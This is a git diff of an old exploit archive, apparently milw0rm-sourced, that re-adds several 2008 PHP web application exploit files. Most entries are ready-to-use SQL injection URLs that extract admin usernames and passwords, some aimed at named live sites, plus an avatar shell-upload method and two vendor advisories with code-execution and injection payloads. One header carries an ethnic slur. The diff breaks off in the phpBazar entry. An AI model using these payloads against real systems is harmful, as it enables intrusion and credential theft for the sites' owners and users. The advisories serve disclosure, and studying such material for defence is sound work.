@@ -1,64 +1,64 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection +++++++++++++ -======================================================= - - -<<->> script : VidiScript - -<<->> Demo site : www.vidiscript.com/mainstreamdemo - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : N0-WaY - -<<->> Exploit : - - 1) first Register in site - - 2) login and go to ur profil and in Current avatar .. u can upload shell ... shell.php - - 3) hack site :) finished - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus - - :: abo-najm $ hacker-b0y & br1ght-dark & eng.silent $ spid3r-net & golden-zero - -<<->> InjEctOr5 TeaM - - -<<->> All muslims - -# milw0rm.com [2008-08-18] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection +++++++++++++ +======================================================= + + +<<->> script : VidiScript + +<<->> Demo site : www.vidiscript.com/mainstreamdemo + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : N0-WaY + +<<->> Exploit : + + 1) first Register in site + + 2) login and go to ur profil and in Current avatar .. u can upload shell ... shell.php + + 3) hack site :) finished + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus + + :: abo-najm $ hacker-b0y & br1ght-dark & eng.silent $ spid3r-net & golden-zero + +<<->> InjEctOr5 TeaM + + +<<->> All muslims + +# milw0rm.com [2008-08-18] diff --git a/platforms/php/webapps/6260.txt b/platforms/php/webapps/6260.txt index 440dcda26..ab8061451 100755 --- a/platforms/php/webapps/6260.txt +++ b/platforms/php/webapps/6260.txt 
@@ -1,35 +1,35 @@ -######################################################################################## -# -# Name : cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities -# Author : cOndemned [ Dark-Coders ] -# Greetz : Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more... -# Conditions : Magic quotes gpc = On & Off / User must be logged into -# -######################################################################################## - -source of /show_topic.php : - - 21. $id=$_REQUEST['id']; - 22. - 23. if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p=''; - 24. - 25. $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass); - 26. - 27. mysql_select_db($mysql_db); - 28. - 29. $sql = "SELECT * FROM `topics` WHERE `id` = $id"; - - - proof of concept : - - /show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/* - - -second sql injection (magic quotes gpc must be off): - - /profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/* - - -just 4 fun - -# milw0rm.com [2008-08-18] +######################################################################################## +# +# Name : cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities +# Author : cOndemned [ Dark-Coders ] +# Greetz : Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more... +# Conditions : Magic quotes gpc = On & Off / User must be logged into +# +######################################################################################## + +source of /show_topic.php : + + 21. $id=$_REQUEST['id']; + 22. + 23. if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p=''; + 24. + 25. $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass); + 26. + 27. mysql_select_db($mysql_db); + 28. + 29. 
$sql = "SELECT * FROM `topics` WHERE `id` = $id"; + + + proof of concept : + + /show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/* + + +second sql injection (magic quotes gpc must be off): + + /profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/* + + +just 4 fun + +# milw0rm.com [2008-08-18] diff --git a/platforms/php/webapps/6261.txt b/platforms/php/webapps/6261.txt index c6e93fea4..08b7c8174 100755 --- a/platforms/php/webapps/6261.txt +++ b/platforms/php/webapps/6261.txt 
@@ -1,115 +1,115 @@ -########################################################## -# GulfTech Security Research August 16, 2008 -########################################################## -# Vendor : Turnkey Web Tools, Inc -# URL : http://www.turnkeywebtools.com -# Version : PHP Live Helper <= 2.0.1 -# Risk : Multiple Vulnerabilities -########################################################## - - -Description: -PHP Live Helper is an online support system written in php that -allows the visitors of a website to interact in real time with -the site owners. There are a number of issues in PHP Live Helper -that allow for several different attacks such as SQL Injection, -Variable Overwriting, and remote code execution. The issues -require no authentication to exploit, and users are encouraged -to upgrade as soon as possible. - - - -SQL Injection: -There are a number of SQL Injection issues in PHP Live Helper -that allow for an attacker to have arbitrary access to database -contents such as administrator credentials. First, let's have a -look at global.php @ lines 51-60 - -function get ($table, $id, $from="id") { - $result=$this->DB_site->query_first("SELECT * FROM ". - $this->dbprefix.$table." where ".$from."='$id'"); - if (is_array($result)) { - foreach ($result as $key => $val) { - $info[$key] = stripslashes($val); - } - } - return $info; -} - -As we can see in the above code, all of the parameters passed to -the get() function are unsanitized. So, if the data is not sanitized -before being sent to get() we have an SQL Injection issue. - -/onlinestatus_html.php?dep=-99' UNION SELECT 1,2,3,4,5,6,7,8 FROM -admin_accounts WHERE id=1 AND MID(password,1,1)=concat(char(50))/* - -An example of the vulnerable function being called can be seen in -onlinestatus_html.php @ line 19. As a result a url like the one -above can be used to enumerate the admin password for the PHP Live -Helper installation. 
If there is a match to the specified character -you will see an sql error, otherwise you will see an image file. - - - -Arbitrary Variable Overwriting: -PHP Live Helper is vulnerable to a limited Variable Overwriting issue -due to some faulty register globals emulation code. The vulnerable code -in question can be found at libsecure.php @ lines 400-414 - -unset ($_GET[abs_path]); -$rg = ini_get ('register_globals'); -$getget_count = @count ($_GET); -$getget_keys = @array_keys ($_GET); -for ($i = 0; $i < $getget_count; ++$i) -{ - $getget_name = $getget_keys[$i]; - $getget_value = $_GET[$getget_keys[$i]]; - $_GET[$getget_name] = strip_tags (urldecode ($getget_value)); - if ($rg == 1) - { - $$getget_name = strip_tags (urldecode ($getget_value)); - continue; - } -} - -The above code shows that variables can be overwritten, but because -of where it is called, only variables from within the db config file -can be overwritten (database info, and language file setting). This -is enough though to allow an attacker to execute arbitrary code on the -server by overwriting the table prefix variable with an arbitrary SQL -query in order to gather the location of report files, and then -overwriting the language file so that the report containing the -malicious php code is included and executed. The odd thing is that this -registers global emulation code is only called when register globals is -already on, so it is kind of pointless. - - - -Arbitrary Code Execution: -A different bit of code is set to run when register globals are off. The -code in question is located in /includes/globalsoff.php and attempts to -emulate register gloabls by recursively creating variables based on the -GPC super globals. The problem is that all of the variable creation is -done using eval() and thus allows for remote code execution. - -/chat.php?rg=0&test=";phpinfo();exit;// - -A url like the one shown above will successfully execute the specified -arbitrary php code. 
It should be noted that by setting rg=0 an attacker -can have this code ran regardless of register globals settings since if -globals is on you can influence the "rg" parameter, and if it is off, -the script runs as intended. - - - -Solution: -The TurnKeyWebTools developers have addressed these issues in the latest -version of PHP Live Helper which can be found at the following url. - -http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=62 - - -Credits: -James Bercegay of the GulfTech Security Research Team - -# milw0rm.com [2008-08-18] +########################################################## +# GulfTech Security Research August 16, 2008 +########################################################## +# Vendor : Turnkey Web Tools, Inc +# URL : http://www.turnkeywebtools.com +# Version : PHP Live Helper <= 2.0.1 +# Risk : Multiple Vulnerabilities +########################################################## + + +Description: +PHP Live Helper is an online support system written in php that +allows the visitors of a website to interact in real time with +the site owners. There are a number of issues in PHP Live Helper +that allow for several different attacks such as SQL Injection, +Variable Overwriting, and remote code execution. The issues +require no authentication to exploit, and users are encouraged +to upgrade as soon as possible. + + + +SQL Injection: +There are a number of SQL Injection issues in PHP Live Helper +that allow for an attacker to have arbitrary access to database +contents such as administrator credentials. First, let's have a +look at global.php @ lines 51-60 + +function get ($table, $id, $from="id") { + $result=$this->DB_site->query_first("SELECT * FROM ". + $this->dbprefix.$table." 
where ".$from."='$id'"); + if (is_array($result)) { + foreach ($result as $key => $val) { + $info[$key] = stripslashes($val); + } + } + return $info; +} + +As we can see in the above code, all of the parameters passed to +the get() function are unsanitized. So, if the data is not sanitized +before being sent to get() we have an SQL Injection issue. + +/onlinestatus_html.php?dep=-99' UNION SELECT 1,2,3,4,5,6,7,8 FROM +admin_accounts WHERE id=1 AND MID(password,1,1)=concat(char(50))/* + +An example of the vulnerable function being called can be seen in +onlinestatus_html.php @ line 19. As a result a url like the one +above can be used to enumerate the admin password for the PHP Live +Helper installation. If there is a match to the specified character +you will see an sql error, otherwise you will see an image file. + + + +Arbitrary Variable Overwriting: +PHP Live Helper is vulnerable to a limited Variable Overwriting issue +due to some faulty register globals emulation code. The vulnerable code +in question can be found at libsecure.php @ lines 400-414 + +unset ($_GET[abs_path]); +$rg = ini_get ('register_globals'); +$getget_count = @count ($_GET); +$getget_keys = @array_keys ($_GET); +for ($i = 0; $i < $getget_count; ++$i) +{ + $getget_name = $getget_keys[$i]; + $getget_value = $_GET[$getget_keys[$i]]; + $_GET[$getget_name] = strip_tags (urldecode ($getget_value)); + if ($rg == 1) + { + $$getget_name = strip_tags (urldecode ($getget_value)); + continue; + } +} + +The above code shows that variables can be overwritten, but because +of where it is called, only variables from within the db config file +can be overwritten (database info, and language file setting). 
This +is enough though to allow an attacker to execute arbitrary code on the +server by overwriting the table prefix variable with an arbitrary SQL +query in order to gather the location of report files, and then +overwriting the language file so that the report containing the +malicious php code is included and executed. The odd thing is that this +registers global emulation code is only called when register globals is +already on, so it is kind of pointless. + + + +Arbitrary Code Execution: +A different bit of code is set to run when register globals are off. The +code in question is located in /includes/globalsoff.php and attempts to +emulate register gloabls by recursively creating variables based on the +GPC super globals. The problem is that all of the variable creation is +done using eval() and thus allows for remote code execution. + +/chat.php?rg=0&test=";phpinfo();exit;// + +A url like the one shown above will successfully execute the specified +arbitrary php code. It should be noted that by setting rg=0 an attacker +can have this code ran regardless of register globals settings since if +globals is on you can influence the "rg" parameter, and if it is off, +the script runs as intended. + + + +Solution: +The TurnKeyWebTools developers have addressed these issues in the latest +version of PHP Live Helper which can be found at the following url. + +http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=62 + + +Credits: +James Bercegay of the GulfTech Security Research Team + +# milw0rm.com [2008-08-18] diff --git a/platforms/php/webapps/6270.txt b/platforms/php/webapps/6270.txt index 7fc035501..c927a7950 100755 --- a/platforms/php/webapps/6270.txt +++ b/platforms/php/webapps/6270.txt 
@@ -1,50 +1,50 @@ -|___________________________________________________| -| -| Affiliate Directory ( id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| -| script : http://scripts-for-sites.com/item.php?item=107 -| -| DorK : "Copyright 2005 Affiliate Directory" -|___________________________________________________| - -Exploit: - - -www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links-- - - - - - -L!VE DEMO: : - - -http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links-- - - - -____________________________( Greetz )____________________________ -| -| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | -| -| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-08-19] +|___________________________________________________| +| +| Affiliate Directory ( id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| +| script : http://scripts-for-sites.com/item.php?item=107 +| +| DorK : "Copyright 2005 Affiliate Directory" +|___________________________________________________| + +Exploit: + + 
+www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links-- + + + + + +L!VE DEMO: : + + +http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links-- + + + +____________________________( Greetz )____________________________ +| +| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | +| +| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-08-19] diff --git a/platforms/php/webapps/6271.txt b/platforms/php/webapps/6271.txt index 2e68502ec..d17aad031 100755 --- a/platforms/php/webapps/6271.txt +++ b/platforms/php/webapps/6271.txt 
@@ -1,59 +1,59 @@ -|___________________________________________________| -| -| Ad Board (trr.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://www.yourfreeworld.com/script/adboard.php -| -| DorK : inurl:trr.php?id= -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings-- - - - - - - -L!VE DEMO: -_________ - - -http://www.downlinegoldmine.com/adboard/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings-- - - -____________ - -Admin Login : - -www.[target].com/Script/admin.php - -____________ -____________________________( Greetz )____________________________ -| -| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | -| -| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-08-19] +|___________________________________________________| +| +| Ad Board (trr.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script : http://www.yourfreeworld.com/script/adboard.php +| +| DorK : inurl:trr.php?id= +|___________________________________________________| + +Exploit: +________ + + + 
+www.[target].com/Script/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings-- + + + + + + +L!VE DEMO: +_________ + + +http://www.downlinegoldmine.com/adboard/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings-- + + +____________ + +Admin Login : + +www.[target].com/Script/admin.php + +____________ +____________________________( Greetz )____________________________ +| +| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | +| +| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-08-19] diff --git a/platforms/php/webapps/6273.txt b/platforms/php/webapps/6273.txt index b375a9f40..74f77b81f 100755 --- a/platforms/php/webapps/6273.txt +++ b/platforms/php/webapps/6273.txt 
@@ -1,79 +1,79 @@
-##########################################################
-# GulfTech Security Research August 18, 2008
-##########################################################
-# Vendor : Turnkey Web Tools, Inc
-# URL : http://www.turnkeywebtools.com
-# Version : SunShop <= 4.1.4
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-SunShop shopping cart is a full featured ecommerce solution written
-in php that allows for web masters to run their own online ecommerce
-operation. Unfortunately there are a number of SQL Injection issues
-in SunShop that allow for an attacker to have arbitrary access to the
-SunShop database where they can access information such as customer
-and administrator details. An updated version of SunShop has been
-released to address these issues, and users should upgrade soon.
-
-
-
-SQL Injection:
-There are quite a few SQL Injection issues within SunShop that for an
-attacker to have arbitrary access to the SunShop database. The first
-example we will have a look at is in class.ajax.php @ lines 348-362
-
-function edit_registry ($id="") {
- global $DB_site, $dbprefix, $settings, $lang, $sess;
- $data = $DB_site->query_first("SELECT * FROM `".$dbprefix."users_registry`
- WHERE id='".$_POST[id]."' AND userid='".$sess->gvar('userid')."'");
- $data = filter_data($data);
- $out = 'document.getElementById(\'wishform\').style.display = \'none\';';
- $out .= 'document.getElementById(\'wisheditform\').style.display = \'block\';';
- $out .= 'form = document.forms[\'edit_registry\'];';
- $out .= 'form.elements[\'event[id]\'].value = \''.js_clean($data[id]).'\';';
- $out .= 'form.elements[\'event[name]\'].value = \''.js_clean($data[name]).'\';';
- $out .= 'form.elements[\'event[desc]\'].value = \''.js_clean($data[description]).'\';';
- $out .= 'form.elements[\'event[month]\'].selectedIndex = '.(date('m',
- strtotime($data['date']))-1).';';
- $out .= 'form.elements[\'event[day]\'].selectedIndex = '.(date('d',
- strtotime($data['date']))-1).';';
- $out .= 'form.elements[\'event[year]\'].selectedIndex = '.((date('Y',
- strtotime($data['date'])))-date('Y')).';';
- return $out;
-}
-
-As seen above the SQL Injection issue here is pretty straight forward
-and is a result of a $_POST variable being used in the middle of the
-query. An attacker could exploit this SQL Injection issue by making a
-post request to "/index.php?l=edit_registry&p=1" with the following
-post data.
-
-id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*
-
-Upon successful exploitation an attacker would be presented with the
-targeted credentials. In addition to this SQL Injection are several more
-SQL Injection issues within class.ajax.php and can be found at lines 77,
-113, 138 (via the check_email() function), 349, 374, and 400. With the
-exception of the issue @ line 138 these issues are very easily identified as they use GPC variables directly within SQL queries.
-
-
-
-Solution:
-The TurnKeyWebTools developers have addressed these issues in the latest
-version of SunShop which can be found at the following url.
-
-http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=63
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-
-
-Related Info:
-The original advisory can be found at the following location
-http://www.gulftech.org/?node=research&article_id=00125-08182008
-
-# milw0rm.com [2008-08-19]
+##########################################################
+# GulfTech Security Research August 18, 2008
+##########################################################
+# Vendor : Turnkey Web Tools, Inc
+# URL : http://www.turnkeywebtools.com
+# Version : SunShop <= 4.1.4
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+SunShop shopping cart is a full featured ecommerce solution written
+in php that allows for web masters to run their own online ecommerce
+operation. Unfortunately there are a number of SQL Injection issues
+in SunShop that allow for an attacker to have arbitrary access to the
+SunShop database where they can access information such as customer
+and administrator details. An updated version of SunShop has been
+released to address these issues, and users should upgrade soon.
+
+
+
+SQL Injection:
+There are quite a few SQL Injection issues within SunShop that for an
+attacker to have arbitrary access to the SunShop database. The first
+example we will have a look at is in class.ajax.php @ lines 348-362
+
+function edit_registry ($id="") {
+ global $DB_site, $dbprefix, $settings, $lang, $sess;
+ $data = $DB_site->query_first("SELECT * FROM `".$dbprefix."users_registry`
+ WHERE id='".$_POST[id]."' AND userid='".$sess->gvar('userid')."'");
+ $data = filter_data($data);
+ $out = 'document.getElementById(\'wishform\').style.display = \'none\';';
+ $out .= 'document.getElementById(\'wisheditform\').style.display = \'block\';';
+ $out .= 'form = document.forms[\'edit_registry\'];';
+ $out .= 'form.elements[\'event[id]\'].value = \''.js_clean($data[id]).'\';';
+ $out .= 'form.elements[\'event[name]\'].value = \''.js_clean($data[name]).'\';';
+ $out .= 'form.elements[\'event[desc]\'].value = \''.js_clean($data[description]).'\';';
+ $out .= 'form.elements[\'event[month]\'].selectedIndex = '.(date('m',
+ strtotime($data['date']))-1).';';
+ $out .= 'form.elements[\'event[day]\'].selectedIndex = '.(date('d',
+ strtotime($data['date']))-1).';';
+ $out .= 'form.elements[\'event[year]\'].selectedIndex = '.((date('Y',
+ strtotime($data['date'])))-date('Y')).';';
+ return $out;
+}
+
+As seen above the SQL Injection issue here is pretty straight forward
+and is a result of a $_POST variable being used in the middle of the
+query. An attacker could exploit this SQL Injection issue by making a
+post request to "/index.php?l=edit_registry&p=1" with the following
+post data.
+
+id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*
+
+Upon successful exploitation an attacker would be presented with the
+targeted credentials. In addition to this SQL Injection are several more
+SQL Injection issues within class.ajax.php and can be found at lines 77,
+113, 138 (via the check_email() function), 349, 374, and 400. With the
+exception of the issue @ line 138 these issues are very easily identified as they use GPC variables directly within SQL queries.
+
+
+
+Solution:
+The TurnKeyWebTools developers have addressed these issues in the latest
+version of SunShop which can be found at the following url.
+
+http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=63
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+
+
+Related Info:
+The original advisory can be found at the following location
+http://www.gulftech.org/?node=research&article_id=00125-08182008
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6276.txt b/platforms/php/webapps/6276.txt
index e7ba17e3e..79f6f481a 100755
--- a/platforms/php/webapps/6276.txt
+++ b/platforms/php/webapps/6276.txt
@@ -1,52 +1,52 @@
-|___________________________________________________|
-|
-| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------S.W.A.T.----------------------|
-|
-| Author: S.W.A.T.
-|
-| Home : www.svvat.ir
-|
-| email: svvateam[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-| |
-|
-| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
-|
-| DorK : inurl:tr.php?id= Banner
-|___________________________________________________|
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-____________
-
-Admin Login :
-
-www.[target].com/Script/admin.php
-
-or
-
-www.[target].com/Script/adadmin.php
-
-# milw0rm.com [2008-08-19]
+|___________________________________________________|
+|
+| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------S.W.A.T.----------------------|
+|
+| Author: S.W.A.T.
+|
+| Home : www.svvat.ir
+|
+| email: svvateam[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+| |
+|
+| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
+|
+| DorK : inurl:tr.php?id= Banner
+|___________________________________________________|
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+____________
+
+Admin Login :
+
+www.[target].com/Script/admin.php
+
+or
+
+www.[target].com/Script/adadmin.php
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6277.txt b/platforms/php/webapps/6277.txt
index 6e4a7f018..004642503 100755
--- a/platforms/php/webapps/6277.txt
+++ b/platforms/php/webapps/6277.txt
@@ -1,45 +1,45 @@
-|___________________________________________________|
-|
-| Bookmarks V 1.1.02 (id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-| Author: Hussin X
-|
-| Home : www.tryag.cc/cc
-|
-| email: darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-| |
-|
-| script : http://lbstone.com/apb/?version=1.1.02
-|
-| DorK : Powered by Active PHP Bookmarks v1.1.02
-|
-| DorK : inurl:bookmarks/view_group.php?id=
-|___________________________________________________|
-
-
-
-
-
-Exploit:
-
-www.[target].com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|
-| Iraqihack | FAHD | mos_chori | Silic0n
-|
-|_________________________________________________________________
-
-
- Im IRAQi
-
-# milw0rm.com [2008-08-19]
+|___________________________________________________|
+|
+| Bookmarks V 1.1.02 (id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+| Author: Hussin X
+|
+| Home : www.tryag.cc/cc
+|
+| email: darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+| |
+|
+| script : http://lbstone.com/apb/?version=1.1.02
+|
+| DorK : Powered by Active PHP Bookmarks v1.1.02
+|
+| DorK : inurl:bookmarks/view_group.php?id=
+|___________________________________________________|
+
+
+
+
+
+Exploit:
+
+www.[target].com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|
+| Iraqihack | FAHD | mos_chori | Silic0n
+|
+|_________________________________________________________________
+
+
+ Im IRAQi
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6280.txt b/platforms/php/webapps/6280.txt
index de101b32f..dfeecc208 100755
--- a/platforms/php/webapps/6280.txt
+++ b/platforms/php/webapps/6280.txt
@@ -1,31 +1,31 @@
-phpBazar SQL Injection Vulnerability all versions
-by: e.wiZz!
-info: Bosnian Idiot FTW!
-
-In the wild....
-*********************************************************************
-Script site : http://www.smartisoft.com/
-
-Vulnerability:
-http://inthewild.com//classified.php?catid=x&subcatid=x&adid=x SQL INJECTION
-
-PoC on demo site:
-
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 911/*
-Unknown column '911' in 'order clause'
-
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 67/*
-Unknown column '67' in 'order clause'
-
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 66/*
-Error : Database Query Error
-
-...so its 66...omg :D
-you can find columns this like:
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select sum(somecolumn) from users--
-
-username,password:
-
-http://www.xxx.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/*
-
-# milw0rm.com [2008-08-20]
+phpBazar SQL Injection Vulnerability all versions
+by: e.wiZz!
+info: Bosnian Idiot FTW!
+
+In the wild....
+*********************************************************************
+Script site : http://www.smartisoft.com/
+
+Vulnerability:
+http://inthewild.com//classified.php?catid=x&subcatid=x&adid=x SQL INJECTION
+
+PoC on demo site:
+
